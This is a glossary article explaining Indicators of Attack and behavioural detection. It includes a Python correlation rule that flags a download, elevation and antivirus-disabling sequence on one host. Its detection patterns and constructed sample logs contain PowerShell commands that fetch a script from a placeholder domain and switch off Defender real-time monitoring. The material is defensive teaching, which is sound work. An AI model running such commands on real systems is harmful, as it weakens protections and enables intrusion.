Indicator of Attack (IOA)

An Indicator of Attack (IOA) is a behavioral signal that suggests a threat actor is actively attempting to breach or exploit a system. Unlike Indicators of Compromise (IOCs), which are signs that an attack has already taken place, IOAs focus on the tactics, techniques, and procedures (TTPs) an attacker uses during the early or active stages of an attack.

For example, a user who unexpectedly runs PowerShell to download a file from a suspicious domain, followed by attempts to escalate privileges and disable antivirus software, may not trigger a traditional alert if no known malware is present. But the sequence of actions tells a story of an attack in progress. IOAs recognize that story and flag it—even in the absence of known threat signatures.

Want to save time on reporting?

Let PentestPad generate, track, and export your reports - automatically.

How to Use IOAs in Your Security Operations

To effectively detect IOAs, organizations must implement tools and practices that focus on behavioral monitoring and context analysis. This includes using Endpoint Detection and Response (EDR) platforms, Security Information and Event Management (SIEM) systems, and User and Entity Behavior Analytics (UEBA) tools.

Detection rules should be based on attacker techniques rather than static signatures. These rules should monitor for actions like privilege escalation attempts, suspicious scripting activity, unusual lateral movement, and unexpected process spawning. Correlation engines can then combine these behaviors into a timeline, flagging them as potential attacks.
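
The scenario from the opening paragraph (script download, privilege escalation attempt, antivirus disabled) turned into a small correlation rule, as an added example that is not part of the original article: events are grouped per host, walked in time order, and an alert is raised only when all three behavioural stages appear in sequence within a 30-minute window. The stage matchers, window and sample telemetry are assumptions constructed for the example, not a vendor's rule set.

```python
import re
from datetime import datetime, timedelta

# Ordered attack stages from the article's scenario. Each stage is a behaviour,
# not a file hash. (Hypothetical matchers; real rules would use richer telemetry.)
STAGES = [
    ("download",        re.compile(r"Invoke-WebRequest|DownloadString", re.I)),
    ("priv_escalation", re.compile(r"-Verb\s+RunAs", re.I)),
    ("disable_av",      re.compile(r"Set-MpPreference.*-Disable", re.I)),
]
WINDOW = timedelta(minutes=30)  # all stages must occur within this span on one host

# Constructed sample telemetry (timestamp, host, user, command line); not real logs.
EVENTS = [
    ("2024-05-01T09:00:05", "ws01", "alice", "powershell Invoke-WebRequest http://cdn-upd.example/a.ps1"),
    ("2024-05-01T09:01:10", "ws01", "alice", "powershell Start-Process cmd -Verb RunAs"),
    ("2024-05-01T09:02:40", "ws01", "alice", "powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("2024-05-01T11:15:00", "ws02", "bob",   "powershell Invoke-WebRequest https://intranet.example/r.csv"),
    ("2024-05-01T16:30:00", "ws02", "bob",   "powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
]

def stage_of(cmdline):
    """Return the name of the first stage whose matcher hits, or None."""
    for name, pattern in STAGES:
        if pattern.search(cmdline):
            return name
    return None

def correlate(events, window=WINDOW):
    """Per host, walk events in time order and collect the stage sequence.
    Out-of-order stages are ignored; a chain that exceeds the window is dropped.
    Returns {host: [matched events in stage order]} for hosts with a full chain."""
    alerts, by_host = {}, {}
    for ev in sorted(events, key=lambda e: e[0]):
        by_host.setdefault(ev[1], []).append(ev)
    for host, evs in by_host.items():
        chain = []  # events matched so far, one per stage
        for ev in evs:
            ts = datetime.fromisoformat(ev[0])
            if chain and ts - datetime.fromisoformat(chain[0][0]) > window:
                chain = []  # too slow to be one attack: restart from this event
            if stage_of(ev[3]) == STAGES[len(chain)][0]:
                chain.append(ev)
            if len(chain) == len(STAGES):
                alerts[host] = chain
                break
    return alerts
```

Running `correlate(EVENTS)` flags only ws01; ws02 shows two of the three behaviours hours apart with no escalation step, which is the kind of benign administrative activity a per-event signature would over-alert on.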

Security teams should also regularly update detection playbooks based on real-world attack patterns, such as those found in the MITRE ATT&CK framework. This ensures that detection logic evolves with the threat landscape.